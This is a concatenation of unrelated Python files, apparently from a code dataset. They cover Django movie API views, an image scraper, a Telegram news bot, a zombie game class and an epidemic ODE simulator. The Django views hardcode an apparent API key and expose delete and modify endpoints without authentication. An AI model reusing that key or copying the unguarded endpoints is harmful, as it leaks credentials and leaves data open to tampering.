CommentSerializer,CommentListSerializer\nfrom .serializers import RecommendationSerializer\n\n# from django.contrib.auth.decorators import login_required\n# from django.http import JsonResponse\n\n\n# Create your views here.\nAPI_KEY = '611b17e08929eff3b420b33f2d24c4bb'\n\n@api_view(['GET'])\ndef index(request):\n movies = Movie.objects.all()\n serializer = MovieListSerializer(movies, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef movie_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n print(genre)\n movies = Movie.objects.filter(genres_ids=genre).all()\n print(movies)\n serializer = MovieListSerializer(movies, many=True)\n return Response(serializer.data)\n \n\n@api_view(['GET'])\ndef detail(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = MovieSerializer(movie)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef add_movie(request):\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.error)\n\n@api_view(['DELETE'])\ndef delete_movie(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n 
movie.delete()\n return Response(status=200)\n\n@api_view(['PUT'])\ndef modify_movie(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.error)\n\ndef like(request):\n pass\n\n@api_view(['GET'])\ndef get_genre(request):\n genres = Genre.objects.all()\n serializer = GenreSerializer(genres, many=True)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef add_genre(request):\n serializer = GenreListSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(status=400)\n \n@api_view(['POST'])\n#@permission_classes([IsAuthenticated])\ndef delete_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n genre.delete()\n return Response(status=200)\n \n\n@api_view(['PUT'])\ndef modify_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n serializer = GenreListSerializer(genre, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(status=200)\n\n\n@api_view(['POST'])\ndef create_comment(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = CommentSerializer(data=request.data)\n if serializer.is_valid():\n user = request.user\n serializer.save(movie_id=movie, user=user)\n return Response(serializer.data)\n \n\n@api_view(['GET'])\ndef get_comments(request,movie_pk):\n comments = Comment.objects.filter(movie_id=movie_pk).order_by('-pk')\n serializer = CommentListSerializer(comments,many=True)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef delete_comment(reqeust, comment_pk):\n comment = get_object_or_404(Comment, pk=comment_pk)\n comment.delete()\n return Response(status=200)\n\n\n@api_view(['POST'])\ndef like(request, movie_pk):\n print(request.user)\n movie = get_object_or_404(Movie, pk=movie_pk)\n user = request.user\n if movie.like_users.filter(id=user.pk).exists():\n movie.like_users.remove(user)\n liked = False\n\n else:\n movie.like_users.add(user)\n liked = True\n\n context = {\n 'liked': liked,\n #'count': like_movies\n }\n\n return JsonResponse(context)\n\n\n@api_view(['GET'])\ndef checkLike(request, movie_pk):\n user = request.user\n print(user)\n movie = get_object_or_404(Movie, pk=movie_pk)\n if movie.like_users.filter(id=request.user.pk).exists():\n print('yes')\n liked = True\n else:\n liked = False\n print('no')\n context = {\n 'liked': liked,\n }\n return JsonResponse(context)\n\n\n#추천 알고리즘\n@api_view(['GET'])\ndef recommendation(request):\n user = request.user\n #유저가 좋아한 영화의 장르 추출\n like_genres = set() # 중복제거위해 set 사용\n if user.like_movies.exists():\n for movie in user.like_movies.all():\n #print(movie.genres_ids.values('id'))\n for genre in movie.genres_ids.all().values('id'):\n like_genres.add(genre['id'])\n print(like_genres)\n\n #좋아하는 장르별 영화 추천(좋아요 눌러진순)\n genre_dict = {}\n for genre in like_genres:\n name = get_object_or_404(Genre, pk=genre)\n movies = Movie.objects.annotate(num_like_users=Count(\n 'like_users')).filter(genres_ids=genre).all()[:8]\n serializer = RecommendationSerializer(movies, many=True)\n genre_dict[name.genre_name] = serializer.data\n #print(genre_dict)\n #genre_dict = genre_dict\n return JsonResponse(genre_dict)\n\n #좋아요 누른 영화가 없을 경우\n else:\n genre_dict = {}\n for genre in Genre.objects.all():\n print(genre.id, genre.genre_name)\n movies = 
Movie.objects.annotate(num_like_users=Count('like_users')).filter(genres_ids=genre.id).all()[:8]\n serializer = MovieListSerializer(movies, many=True)\n genre_dict[genre.genre_name] = serializer.data\n return JsonResponse(genre_dict)\n\n ","sub_path":"movie_api/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"613376006","text":"import os\nimport random\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import cpu_count\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\n\nfrom config import mongo, headers\n\n\nclass mzitu:\n image_path = ''\n\n def __init__(self, root, page=1, min_time=0, max_time=1):\n self.url = f'https://www.mzitu.com/page/{page}'\n self.root = root\n headers['referer'] = 'https://www.mzitu.com/'\n collection_name = 'mzitu'\n self.db = MongoClient(\n \"mongodb://%s:%s@%s:%s\" % (\n mongo.get('user'), mongo.get('password'), mongo.get('host'),\n mongo.get('port')))[mongo.get('database')]\n self.collection = self.db[collection_name]\n self.min_time = min_time\n self.max_time = max_time\n if collection_name in self.db.list_collection_names():\n print('集合已经存在')\n self.collection.drop()\n print('集合已经删除')\n\n def run(self):\n with ThreadPoolExecutor(max_workers=cpu_count()) as thread:\n thread.map(self.get_images,\n BeautifulSoup(requests.get(self.url, headers=headers).text, 'lxml').find('ul',\n id='pins').find_all(\n 'li'))\n\n def get_images(self, data):\n image = data.find('img')\n self.image_path = f'{self.root}/{image.get(\"alt\")}'\n os.makedirs(self.image_path, exist_ok=True)\n self.save_image(image.get('data-original'), '_avatar')\n with ThreadPoolExecutor(max_workers=cpu_count()) as thread:\n thread.submit(self.get_image, data.find('a').get('href'))\n\n def get_image(self, url):\n self.save_image(\n BeautifulSoup(requests.get(url, headers=headers).text, 'lxml').find('img', class_='blur').get('src'), '1')\n\n def save_image(self, url, file_name='only'):\n with open(f'{self.image_path}/{file_name}{os.path.splitext(url)[1]}', 'wb') as f:\n f.write(requests.get(url, headers=headers).content)\n print(f'成功下载 {url}')\n time.sleep(random.randint(self.min_time, self.max_time))\n\n\nif __name__ == '__main__':\n current_path = os.getcwd() + '/images'\n mzitu(current_path).run()\n","sub_path":"Reptiles/mzitu.py","file_name":"mzitu.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"562805325","text":"def comp(a):\n return a[1]\n\nclass Solution:\n def activitySelection(self,n,start,end):\n n=len(start)\n a=[]\n for i in range(n):\n a.append([start[i],end[i]])\n a=sorted(a,key=comp)\n res=1\n i=0\n for j in range(1,n):\n if(a[j][0]>a[i][1]):\n i=j\n res+=1\n return res\nn=int(input())\nstart=list(map(int,input().split()))\nend=list(map(int,input().split()))\nprint(Solution().activitySelection(n,start,end))\n\n","sub_path":"GreedyAlgo/01_activity_selection.py","file_name":"01_activity_selection.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"576042433","text":"# api/urls.py\nfrom django.urls import path, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.routers import DefaultRouter\nfrom .views import CrawlingView\n\n\n\ncrawling_list = 
CrawlingView.as_view({\n    'get': 'list',\n})\ncrawling_detail = CrawlingView.as_view({\n    'get': 'retrieve',\n    'delete': 'destroy',\n})\n\n\nurlpatterns = format_suffix_patterns([\n    \n    path('', crawling_list, name='crawling_list'),\n    path('<int:pk>/', crawling_detail, name='crawling-detail'),\n\n    \n])","sub_path":"backend/main_crawling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"226182527","text":"\n\nfrom xai.brain.wordbase.nouns._civility import _CIVILITY\n\n#class header\nclass _CIVILITIES(_CIVILITY, ):\n\tdef __init__(self,): \n\t\t_CIVILITY.__init__(self)\n\t\tself.name = \"CIVILITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"civility\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_civilities.py","file_name":"_civilities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"172154334","text":"from telegram import Update, ReplyKeyboardMarkup, ReplyKeyboardRemove, replymarkup\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext\nimport economist\nimport harvardbusiness\nimport reuters\nimport time\nfrom urllib.parse import quote\nfrom datetime import datetime\nimport copy\nimport numpy as np\nimport requests\n\n\nnews_url_dic = dict()\nnews_url_dic[\"economist\"] = economist.get_economist_news\nnews_url_dic[\"hbr\"] = harvardbusiness.get_hbr_news\nnews_url_dic[\"reuters\"] = reuters.get_reuters_news\n\ndef start(update: Update, _: CallbackContext) -> None:\n    reply_keyboard = [[\"/Economist\"],[\"/HarvardBusinessReview\"],[\"/Reuters\"]]\n    update.message.reply_text(\"Which news source would you like to view?\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n    return None\n\ndef get_news_list(title_dic):\n    to_view = \"Which article would you like to view?\\n\\n\"\n    for idx in range(len(title_dic)):\n        to_view += \"{}) {}\\n\".format(idx,title_dic[idx])\n    to_view += \"\\nOr send /start to view news catalog again\"\n    reply_keyboard = list()\n    l = np.array(range(len(title_dic)))\n    for row in np.array_split(l,3):\n        reply_keyboard.append([ int(i) for i in row ])\n    return to_view, reply_keyboard\n\ndef economist_command(update: Update, context: CallbackContext) -> None:\n    if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n        update.message.reply_text(\"Please wait while we receive the latest news.\")\n        dispatcher_dic = add_news_sources()\n        context.bot_data['x'] = dispatcher_dic.copy()\n    handle = \"economist\"\n    context.user_data['state'] = handle\n    title_dic = context.bot_data['x'][handle]['title']\n    to_view, reply_keyboard = get_news_list(title_dic)\n    context.user_data['keyboard'] = reply_keyboard.copy()\n    update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n    return None\n\ndef hbr_command(update: Update, context: CallbackContext) -> None:\n    if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n        update.message.reply_text(\"Please wait while we receive the latest news.\")\n        dispatcher_dic = add_news_sources()\n        context.bot_data['x'] = dispatcher_dic.copy()\n    handle = \"hbr\"\n    context.user_data['state'] = handle\n    title_dic = context.bot_data['x'][handle]['title']\n    to_view, reply_keyboard = get_news_list(title_dic)\n    context.user_data['keyboard'] = reply_keyboard.copy()\n    
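# the saved keyboard lets echo() re-prompt with the same article list on invalid input\n    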
update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\ndef reuters_command(update: Update, context: CallbackContext) -> None:\n if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n update.message.reply_text(\"Please wait while we receive the latest news.\")\n dispatcher_dic = add_news_sources()\n context.bot_data['x'] = dispatcher_dic.copy()\n handle = \"reuters\"\n context.user_data['state'] = handle\n title_dic = context.bot_data['x'][handle]['title']\n to_view, reply_keyboard = get_news_list(title_dic)\n context.user_data['keyboard'] = reply_keyboard.copy()\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\n\ndef echo(update: Update, context: CallbackContext) -> None:\n article_number = 1e8\n user_input = update.message.text\n if user_input.isnumeric():\n article_number = int(float(user_input))\n handle = context.user_data['state']\n if article_number < len(context.bot_data['x'][handle]['news']):\n to_view_ls = context.bot_data['x'][handle]['news'][article_number]\n bot = context.bot\n for to_view in to_view_ls:\n bot.send_message(update.effective_chat.id, to_view)\n to_view = \"Send /start to view news catalog again\"\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardRemove())\n else:\n update.message.reply_text(\n \"Your input value is too large.\",\n reply_markup=ReplyKeyboardMarkup(\n context.user_data['keyboard'],\n one_time_keyboard=True)\n )\n else:\n update.message.reply_text(\n \"Unable to understand your input.\",\n reply_markup=ReplyKeyboardMarkup(\n context.user_data['keyboard'],\n one_time_keyboard=True)\n )\n\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')\n return None\n\ndef add_news_source(dispatcher_dic, handle, headline_func):\n dispatcher_dic[handle] = dict()\n dispatcher_dic[handle]['news'] = dict()\n temp_url_dic, temp_title_dic = headline_func()\n get_news_func = news_url_dic[handle]\n for key in temp_url_dic:\n print(temp_url_dic[key])\n page = requests.get(temp_url_dic[key])\n dispatcher_dic[handle]['news'][key] = get_news_func(page)\n dispatcher_dic[handle]['title'] = temp_title_dic.copy()\n return None\n\ndef add_news_sources():\n dispatcher_dic = dict()\n dispatcher_dic[\"timestamp\"] = datetime.utcnow()\n add_news_source(dispatcher_dic,\"economist\",economist.get_headlines)\n add_news_source(dispatcher_dic,\"hbr\",harvardbusiness.get_headlines)\n add_news_source(dispatcher_dic,\"reuters\",reuters.get_headlines)\n print(datetime.now(),\"News have been loaded\")\n return dispatcher_dic\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(TOKEN)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n dispatcher_dic = add_news_sources()\n dispatcher.bot_data[\"x\"] = dispatcher_dic.copy()\n \n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"Economist\", economist_command))\n dispatcher.add_handler(CommandHandler(\"HarvardBusinessReview\", hbr_command))\n dispatcher.add_handler(CommandHandler(\"Reuters\", reuters_command))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n\n # on non command i.e message - echo the message on Telegram\n dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, 
echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n return None\n\nif __name__ == \"__main__\":\n main()","sub_path":"news_bot.py","file_name":"news_bot.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350094168","text":"import cv2\nimport numpy as np\nimport timeit\nimport black\nimport color\nfrom collections import deque\n\nclasses = [30,117,134,149,164,181,198,215,231,247]\n\n\ndef predict(data_set):\n if(data_set[0]>220):\n return color.predict(data_set[1])\n else:\n return black.predict(data_set[1])\n\nim_all = deque()\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/3.jpg', 0).astype(np.float32), 1.0 / 255.0)]))\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/2.jpg', 0).astype(np.float32),1.0/255)]))\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/1.jpg', 0).astype(np.float32),1.0/255)]))\n\n\nfor cnt in range(10):\n print(cnt+9)\n im = cv2.imread('ir/4/'+ str(4 + cnt) + '.jpg', 0)\n wv = np.array([np.multiply(cv2.imread('wv/4/' + str(4 + cnt) + '.jpg', 0).astype(np.float32), 1.0 / 255)])\n im_all.insert(0,np.array(\n [np.multiply(im.astype(np.float32), 1.0 / 255)]))\n set = np.vstack((im_all[0], wv, im_all[1], im_all[2], im_all[3])).T\n print('start')\n start = timeit.default_timer()\n data_set=[]\n arr =[]\n for i in range(22,458):\n for j in range(22,578):\n arr.append(predict([im[i,j],set[j - 22:j + 23, i - 22:i + 23]]))\n\n stop = timeit.default_timer()\n print(stop - start)\n arr=np.array(arr)\n arr=np.reshape(arr,(436,556))\n cv2.imwrite('predict/4/'+str(9+cnt)+'.jpg',arr)\n im_all.pop()\n","sub_path":"run_set.py","file_name":"run_set.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478461934","text":"import random\n\nrandom.randint(1,10)\n\nclass Zombie:\n\n max_speed = 5\n horde = []\n plague_level = 10\n default_speed = 1\n\n max_strength = 8\n default_strength = 3\n\n def __str__(self):\n message = f'I am a Zombie running at {self.speed} speed, I have {len(Zombie.horde)} zombies brothers\\n'\n return message\n\n def __repr__(self):\n message = self.__str__()\n return message\n\n\n def __init__(self, speed, strength):\n \"\"\"Initializes zombie's speed as well as its strength\n add another lines\n to explain more\n \"\"\"\n if speed > Zombie.max_speed:\n self.speed = Zombie.default_speed\n else:\n self.speed = speed\n\n self.strength = strength if strength <= Zombie.max_strength else Zombie.max_strength\n\n @classmethod\n def spawn(cls):\n \"\"\"Spawns a random number of new zombies, based on the plague level,\n adding each one to the horde. 
Each zombie gets a random speed.\n Each zombie also gets a random strength.\n \"\"\"\n new_zombies = random.randint(1, Zombie.plague_level)\n count = 0\n\n while count < new_zombies:\n speed = random.randint(1, Zombie.max_speed)\n strength = random.randint(1, Zombie.max_strength)\n Zombie.horde.append(Zombie(speed, strength))\n count += 1\n \n input(f\"count {count}, new_zombies {new_zombies}, Zombie.horde {len(Zombie.horde)}\")\n print('->', len(Zombie.horde))\n\n @classmethod\n def new_day(cls):\n \"\"\"Represents the events of yet another day of the zombie apocalypse.\n Every day some zombies die off (phew!), some new ones show up,\n and sometimes the zombie plague level increases.\n the method invoke the increase plague \n \"\"\"\n Zombie.spawn()\n Zombie.some_die_off()\n Zombie.increase_plague_level()\n\n\n @classmethod\n def some_die_off(cls, max_num=10):\n \"\"\"Removes a random number (between 0 and 10) of zombies from the horde.\n \"\"\"\n how_many_die = random.randint(0, 10)\n counter = 0\n while (counter < how_many_die) and (len(Zombie.horde) > 0):\n random_zombie = random.randint(0,len(Zombie.horde) - 1)\n Zombie.horde.pop(random_zombie)\n counter += 1\n\n def encounter(self):\n \"\"\"This instance method represents you coming across a zombie! This will end in different ways:\n 1. You outrun the zombie and escape unscathed!\n 2. You don't outrun the zombie. You actually have to fist fight it. \n 3. You couldn't beat it, how petty :( now you die! \n Returns a summary of what happened.\n \"\"\"\n\n outrun = self.chase()\n encounter_result = ''\n\n if outrun:\n encounter_result = 'You escaped! - share it on Instagram'\n else:\n did_you_survive = self.fight()\n if did_you_survive:\n my_zombie_self = Zombie(10,10)\n Zombie.horde.append(my_zombie_self)\n encounter_result = 'You killed a Zombie! - but make a Zombie out of yourself!'\n else:\n encounter_result = 'You died.'\n \n return encounter_result\n\n def chase(self):\n \"\"\"Represents you trying to outrun this particular zombie.\n Uses `Zombie.max_speed` to generate a random number that represents how fast you manage to run.\n \"\"\"\n your_speed = random.randint(Zombie.max_speed - 1, Zombie.max_speed) # 50% chance to outrun!\n # your_speed = random.randint(1, Zombie.max_speed)\n return your_speed > self.speed\n\n def fight(self, superman_mode_=False):\n \"\"\"Represents you actually fighting a fuckin zombie!\n superman_mode just doubles your strength\n \"\"\"\n your_strength = random.randint(1, Zombie.max_strength) \n your_strength = your_strength * 2 if superman_mode_ else your_strength\n return your_strength > self.strength\n\n @classmethod\n def increase_plague_level(cls):\n \"\"\"generate a random number between 0 and 2 and increase Zombie.plague_level by that amount\n \"\"\"\n cls.plague_level += random.randint(0,2)\n\n\n# zz = Zombie(5,4)\n# print(zz)\n# Zombie.spawn()\n# print(Zombie)\n# print(zz)\n\n\nprint(Zombie.horde) # []\nZombie.new_day()\nprint(Zombie.horde) # [<__main__.Zombie object at 0x7f6f594f0d30>, <__main__.Zombie object at 0x7f6f594f0b70>, <__main__.Zombie object at 0x7f6f594f0d68>]\nzombie1 = Zombie.horde[0]\nprint(zombie1) # Speed: 1 -- Strength: 7\nzombie2 = Zombie.horde[1]\nprint(zombie2) # Speed: 2 -- Strength: 7\nprint(zombie1.encounter()) # You escaped!\nprint(zombie2.encounter()) # You fought the zombie and caught the plague. You are now a zombie too. 
Raaaawrgh\n# Zombie.new_day()\n# print(Zombie.horde) # [<__main__.Zombie object at 0x7f6f594f0d30>, <__main__.Zombie object at 0x7f6f594efef0>, <__main__.Zombie object at 0x7f6f594f0c50>, <__main__.Zombie object at 0x7f6f594f0cc0>]\n# zombie1 = Zombie.horde[0]\n# zombie2 = Zombie.horde[1]\n# print(zombie1.encounter()) # You died!\n# print(zombie2.encounter()) # You escaped!","sub_path":"zombies.py","file_name":"zombies.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"602835553","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import timedelta\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import solve_ivp\nfrom covsirphy.util.error import deprecate\nfrom covsirphy.util.term import Term\nfrom covsirphy.ode.mbase import ModelBase\n\n\nclass ODESimulator(Term):\n \"\"\"\n Simulation of an ODE model for one phase.\n\n Args:\n country (str or None): country name\n province (str or None): province name\n \"\"\"\n\n @deprecate(\"ODESimulator\", new=\"ODEHandler\", version=\"2.19.1-zeta-fu1\")\n def __init__(self, country=None, province=None):\n self.country = country or self.UNKNOWN\n self.province = province or self.UNKNOWN\n # keys: model, step_n, population, param_dict, y0_dict\n self.setting = {}\n # key: non-dim variable name, value: dimensional variable name\n self.var_dict = {}\n\n def add(self, model, step_n, population, param_dict=None, y0_dict=None):\n \"\"\"\n Add models to the simulator.\n\n Args:\n model (subclass of cs.ModelBase): the first ODE model\n step_n (int): the number of steps\n population (int): population in the place\n param_dict (dict):\n - key (str): parameter name\n - value (float): parameter value\n - dictionary of parameter values or None\n - if not include some params, the last values will be used\n - NameError when the model is the first model\n - NameError if new params are included\n y0_dict (dict):\n - key (str): variable name\n - value (float): initial value\n - dictionary of dimensional initial values or None\n - None or if not include some variables, the last values will be used\n - NameError when the model is the first model\n - NameError if new variable are included\n \"\"\"\n if self.setting:\n raise ValueError(\n \"Simulation for two phases is not supported from version 2.7.0\")\n # Register the setting\n self.setting = {\n \"model\": self._ensure_subclass(model, ModelBase, name=\"model\"),\n self.STEP_N: self._ensure_natural_int(step_n, name=\"step_n\"),\n \"population\": self._ensure_population(population),\n ModelBase.PARAM_DICT: self._ensure_parameters(model, param_dict),\n self.Y0_DICT: self._ensure_initial_values(model, y0_dict),\n }\n # Update variable dictionary\n self.var_dict.update(model.VAR_DICT)\n\n def _ensure_parameters(self, model, param_dict):\n \"\"\"\n Validate the dictionary of parameters.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n param_dict (dict):\n - key (str): parameter name\n - value (float): parameter value\n\n Returns:\n dict(str, str): dictionary of parameters\n\n Note:\n If a parameter value is not registered, None will be registered.\n \"\"\"\n param_dict = param_dict or {}\n usable_dict = {\n p: param_dict[p] if p in param_dict else None for p in model.PARAMETERS}\n if None not in usable_dict.values():\n return usable_dict\n none_params = [k for (k, v) in usable_dict.items() if v is None]\n s = \"s\" if len(none_params) > 1 else \"\"\n raise NameError(\n f\"Parameter 
value{s} of {', '.join(none_params)} must be specified by @param_dict.\"\n )\n\n def _ensure_initial_values(self, model, y0_dict):\n \"\"\"\n Validate the dictionary of initial values.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n y0_dict (dict): dictionary of initial values\n - key (str): dimensional variable name\n - value (int):initial value of the variable\n\n Returns:\n dict(str, str): dictionary of initial values\n\n Note:\n If initial value of a variable is not registered, None will be registered.\n \"\"\"\n y0_dict = y0_dict or {}\n usable_dict = {\n v: y0_dict[v] if v in y0_dict else None for v in model.VARIABLES}\n if None not in usable_dict.values():\n return usable_dict\n none_vars = [k for (k, v) in usable_dict.items() if v is None]\n s = \"s\" if len(none_vars) > 1 else \"\"\n raise NameError(\n f\"Initial value{s} of {', '.join(none_vars)} must be specified by @y0_dict.\"\n )\n\n def _solve_ode(self, model, step_n, param_dict, y0_dict, population):\n \"\"\"\n Solve ODE of the model.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n step_n (int): the number of steps\n param_dict (dict): dictionary of parameter values\n - key (str): parameter name\n - value (float): parameter value\n y0_dict (dict): dictionary of initial values\n - key (str): dimensional variable name\n - value (int):initial value of the variable\n population (int): total population\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - columns with dimensional variables\n \"\"\"\n tstart, dt, tend = 0, 1, step_n\n variables = model.VARIABLES[:]\n initials = [y0_dict[var] for var in variables]\n sol = solve_ivp(\n fun=model(population=population, **param_dict),\n t_span=[tstart, tend],\n y0=np.array(initials, dtype=np.int64),\n t_eval=np.arange(tstart, tend + dt, dt),\n dense_output=False\n )\n t_df = pd.Series(data=sol[\"t\"], name=self.TS)\n y_df = pd.DataFrame(data=sol[\"y\"].T.copy(), columns=variables)\n y_df = y_df.round()\n return pd.concat([t_df, y_df], axis=1)\n\n @deprecate(\n old=\"ODESimulator.run()\",\n new=\"ODESimulator.taufree(), .non_dim() or .dim(tau, start_date) directly\")\n def run(self):\n \"\"\"\n From version 2.7.0, it is not necessary to perform ODESimulator.run().\n Please directory use ODESimulator.taufree(), .non_dim() or .dim(tau, start_date)\n \"\"\"\n return self.taufree()\n\n def taufree(self):\n \"\"\"\n Return tau-free results.\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - columns with dimensionalized variables\n \"\"\"\n df = self._solve_ode(**self.setting)\n df[self.TS] = df.index\n return df.reset_index(drop=True)\n\n def non_dim(self):\n \"\"\"\n Return the non-dimensionalized results.\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - non-dimensionalized variables of Susceptible etc.\n \"\"\"\n df = self.taufree()\n df = df.set_index(self.TS)\n df = df.apply(lambda x: x / sum(x), axis=1)\n var_dict_rev = {v: k for (k, v) in self.var_dict.items()}\n df.columns = [var_dict_rev[col] for col in df.columns]\n df = df.reset_index()\n return df\n\n def dim(self, tau, start_date):\n \"\"\"\n Return the dimensionalized results.\n\n Args:\n tau (int): tau value [min]\n start_date (str): start date of the records, like 22Jan2020\n\n Returns:\n pandas.DataFrame\n Index\n reset index\n Columns\n - Date (pd.Timestamp): Observation date\n - Country 
(str): country/region name\n - Province (str): province/prefecture/state name\n - variables of the models (int)\n \"\"\"\n df = self.taufree()\n df = df.drop(self.TS, axis=1).reset_index(drop=True)\n var_cols = df.columns.tolist()\n df = df.astype(np.int64)\n # Date\n start_obj = self._ensure_date(start_date, name=\"start_date\")\n elapsed = pd.Series(df.index * tau)\n df[self.DATE] = start_obj + elapsed.apply(\n lambda x: timedelta(minutes=x)\n )\n # Place\n df[self.COUNTRY] = self.country\n df[self.PROVINCE] = self.province\n # Return the dataframe\n df = df.loc[:, [self.DATE, self.COUNTRY, self.PROVINCE, *var_cols]]\n return df\n","sub_path":"covsirphy/simulation/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257013711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 9 10:19:07 2020\r\n\r\n@author: Yugi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.integrate import ode\r\nfrom scipy.integrate import odeint\r\nfrom scipy.integrate import solve_ivp\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pandas as pd\r\nimport itertools\r\n#from RandomMs import SolarM\r\n'''\r\n \r\n Parameters\r\n ----------\r\n params : \r\n alpha= #average neutron life time\r\n lamb= #decay constant\r\n beta= #delayed neutron fraction\r\n c_pf= #specific heat of moderator\r\n c_pc= #specific heat of coolant\r\n m_f=#mass of fuel\r\n m_c=#mass of coolant\r\n mdot_h=#mass flow rate\r\n T_cine=#Temperature in\r\n a_f=#neutrons to thermal factor\r\n n_e= #scaling for power at equillibrium\r\n alpha_f= #Change in reactivity based on temp of fuel\r\n alpha_c=#Change in reactivity based on temp for moderator\r\n h=#heat transfer coefficient and total area of fuel\r\n Rf =#fouling factor\r\n Returns\r\n -------\r\n derivs : change in neutron density, precursor density, fuel temp, coolant temp\r\n'''\r\n\"\"\"specific outputs of the reactor and heatexchanger\"\"\"\r\nPower = [] #MWth, power of reactor over transient period\r\nPowere =[] #MWe, eletric power of reactor generated from 45% efficiency\r\nInletTemp = [] # Kelvin, Variation of inlet temperature\r\nfinaltemps = []# Kelvin, Variation of outlet temperature\r\nMdotO = []# m/s, Variation of velocity\r\nHtransfer = [] # W/K, Variation of the heat transfer coefficient\r\nQ = [] # W, Variation of heat transfer accross the heat exchanger\r\nNeutronD = [] #normalized neutron density\r\nVprofile=[] # m/s profile of velocity over 12 sections in 1m increments\r\nDelp = [] #Pa Pressure Drop over the reactor with respect to cycles\r\nFuelT =[]# K, Equilibrium Temperature of the fuel\r\nV = []# velocity at each time step in the reactor\r\n\r\n\"\"\"initialization parameters of the reactor active core region based off of \r\nsteady state calculations without thermohydraulic considerations\"\"\"\r\nIDfuelContainer = .35 #meter of the inner diameter fuel tank container\r\nODfuelcontainer =1.05 # meter of the outerdiameter fuel container\r\nHydD = (4*(math.pi/4)*(ODfuelcontainer**2 - 